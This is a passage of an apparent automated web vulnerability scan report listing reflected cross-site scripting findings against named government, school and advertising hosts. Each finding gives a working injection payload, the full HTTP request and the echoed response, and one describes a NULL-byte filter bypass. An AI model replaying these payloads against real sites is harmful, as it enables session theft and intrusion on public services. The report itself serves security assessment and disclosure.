Expires: Sun, 29 Apr 2012 11:15:20 GMT
Last-Modified: Sat, 30 Apr 2011 11:15:20 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:15:20 GMT
Content-Length: 11064

.ektronWindow{display:none;position:fixed!important;top:25%;left:50%;margin-left:-20em;width:40em;background-color:#fff;color:#333;border:1px solid #525252;padding:1em;}.ektronModalOverlay{background-
...[SNIP]...
Area/images/application/macFFBgHack.gif') repeat;}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronBubbleCss38767<script>alert(1)</script>6b4af41bd40 */
/* path:
/* ############################################################# */


3.62. http://nv.gov/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nv.gov
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 726f8<script>alert(1)</script>68099bb65cb was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS726f8<script>alert(1)</script>68099bb65cb HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: application/javascript; charset=utf-8
Expires: Sun, 29 Apr 2012 11:15:36 GMT
Last-Modified: Sat, 30 Apr 2011 11:15:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:15:35 GMT
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS726f8<script>alert(1)</script>68099bb65cb
//path:
//################################################################


3.63. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php [OLTSite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The value of the OLTSite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fa54"style%3d"x%3aexpression(alert(1))"b886bd6f3e was submitted in the OLTSite parameter. This input was echoed as 6fa54"style="x:expression(alert(1))"b886bd6f3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%206fa54"style%3d"x%3aexpression(alert(1))"b886bd6f3e&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:20:49 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:40:49 GMT
RNT-Time: D=69577 t=1304112049847679
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12015

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
<a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" 6fa54"style="x:expression(alert(1))"b886bd6f3e&p_sid=cYoJIJsk&amp;p_accessibility=0&amp;p_redirect=3">
...[SNIP]...

3.64. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /OneStop/ssoNeedPassword.do

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 4c601--><img%20src%3da%20onerror%3dalert(1)>687572642ce was submitted in the REST URL parameter 2. This input was echoed as 4c601--><img src=a onerror=alert(1)>687572642ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /OneStop/ssoNeedPassword.do4c601--><img%20src%3da%20onerror%3dalert(1)>687572642ce HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:47 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3711
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001Ve_rZqzUAfxMgdZZ9TnjQJg:-D00MP; Path=/


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /ssoNeedPassword.do4c601--><img src=a onerror=alert(1)>687572642ce -->
...[SNIP]...

3.65. https://onestop.michigan.gov/onestop-main/OneStop/css/a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/css/a

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload e949a--><img%20src%3da%20onerror%3dalert(1)>374202c28f was submitted in the REST URL parameter 4. This input was echoed as e949a--><img src=a onerror=alert(1)>374202c28f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/css/ae949a--><img%20src%3da%20onerror%3dalert(1)>374202c28f HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/css/none9d952--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E97f23fbd84f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001Ve_rZqzUAfxMgdZZ9TnjQJg:-D00MP

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en-US
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:28:23 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3697
$wsep:


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /css/ae949a--><img src=a onerror=alert(1)>374202c28f -->
...[SNIP]...

3.66. https://onestop.michigan.gov/onestop-main/OneStop/css/none [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/css/none

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 9d952--><img%20src%3da%20onerror%3dalert(1)>97f23fbd84f was submitted in the REST URL parameter 4. This input was echoed as 9d952--><img src=a onerror=alert(1)>97f23fbd84f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/css/none9d952--><img%20src%3da%20onerror%3dalert(1)>97f23fbd84f HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en-US
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:27:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3701
$wsep:


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /css/none9d952--><img src=a onerror=alert(1)>97f23fbd84f -->
...[SNIP]...

3.67. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/ssoRegistration.do

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 157a1--><img%20src%3da%20onerror%3dalert(1)>d3792cda3df was submitted in the REST URL parameter 3. This input was echoed as 157a1--><img src=a onerror=alert(1)>d3792cda3df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/ssoRegistration.do157a1--><img%20src%3da%20onerror%3dalert(1)>d3792cda3df HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3711
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP; Path=/


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /ssoRegistration.do157a1--><img src=a onerror=alert(1)>d3792cda3df -->
...[SNIP]...

3.68. https://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 6e92b<x%20style%3dx%3aexpression(alert(1))>2055d00ca4c was submitted in the name parameter. This input was echoed as 6e92b<x style=x:expression(alert(1))>2055d00ca4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing6e92b<x%20style%3dx%3aexpression(alert(1))>2055d00ca4c&sid=2293&fb_key2=en-us&fb_key3=0&fb_key1=FBPID284 HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:19:06 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: uid=1_1304111946_1304111946847:5137826880823579; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: kwd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: sit=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: cre=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: bpd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: apd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: scg=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: ppd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: afl=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:19:06 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- campaign : 'landing6e92b<x style=x:expression(alert(1))>2055d00ca4c' *not* found -->

3.69. http://serverapi.arcgisonline.com/jsapi/arcgis/ [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serverapi.arcgisonline.com
Path:   /jsapi/arcgis/

Issue detail

The value of the v request parameter is copied into the HTML document as plain text between tags. The payload %009332b<script>alert(1)</script>c8ee692dffc was submitted in the v parameter. This input was echoed as 9332b<script>alert(1)</script>c8ee692dffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /jsapi/arcgis/?v=2.1%009332b<script>alert(1)</script>c8ee692dffc HTTP/1.1
Host: serverapi.arcgisonline.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000,public
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:23:08 GMT
Expires: Sun, 29 Apr 2012 11:23:08 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Connection: keep-alive
Content-Length: 105

'2.1.9332b<script>alert(1)</script>c8ee692dffc\js\\\\dojo\\dojo\\dojo.xd.js' is not a valid virtual path.

3.70. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4954<script>alert(1)</script>14f29a21f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /educationc4954<script>alert(1)</script>14f29a21f60/school/school.php HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=5934cf28e039444eeb4753d2f6b36b61; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">educationc4954<script>alert(1)</script>14f29a21f60/school/school.php</div>
...[SNIP]...

3.71. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 374c9<script>alert(1)</script>9e70c437df3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/school374c9<script>alert(1)</script>9e70c437df3/school.php HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=47e8bdcffbd3ba23755e196867ab537e; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/school374c9<script>alert(1)</script>9e70c437df3/school.php</div>
...[SNIP]...

3.72. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 352ac<script>alert(1)</script>4a6fba8476b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/school/school.php352ac<script>alert(1)</script>4a6fba8476b HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=043a059757f64e9d84cf66eecfca78af; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/school/school.php352ac<script>alert(1)</script>4a6fba8476b</div>
...[SNIP]...

3.73. http://sussex.de.schoolwebpages.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38e16<script>alert(1)</script>27ee5c4b05f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico38e16<script>alert(1)</script>27ee5c4b05f HTTP/1.1
Host: sussex.de.schoolwebpages.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ab115b4e5f848a56539d429d9cdbfd8

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 15:10:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-encoding
Connection: close
Content-Type: text/html
Content-Length: 2797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.ico38e16<script>alert(1)</script>27ee5c4b05f</div>
...[SNIP]...

3.74. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d702d<script>alert(1)</script>fc0fad5692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministrationd702d<script>alert(1)</script>fc0fad5692/index.cfm HTTP/1.1
Host: tomcat2.dot.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:50 GMT
Content-Type: text/html; charset=UTF-8
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 File not found: /ContractsAdministrationd702d<script>alert(1)</script>fc0fad5692/index.cfm</h1><body>
File not found: /ContractsAdministrationd70
...[SNIP]...

3.75. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4acd<script>alert(1)</script>1b405af27ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfmd4acd<script>alert(1)</script>1b405af27ee HTTP/1.1
Host: tomcat2.dot.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:52 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfmd4acd<script>alert(1)</script>1b405af27ee</h1><body>
/ContractsAdministration/index.cfmd4acd<script>alert(1)</s
...[SNIP]...

3.76. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec08<script>alert(1)</script>844d4e5b442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration8ec08<script>alert(1)</script>844d4e5b442/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:16 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration8ec08<script>alert(1)</script>844d4e5b442/index.cfm'"--></style></script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.77. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d29f2<script>alert(1)</script>2ac18f7e295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/d29f2<script>alert(1)</script>2ac18f7e295/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:17 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/d29f2<script>alert(1)</script>2ac18f7e295/style></script><script>netsparker(0x000010)</script></h1><body>
/ContractsAdmi
...[SNIP]...

3.78. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
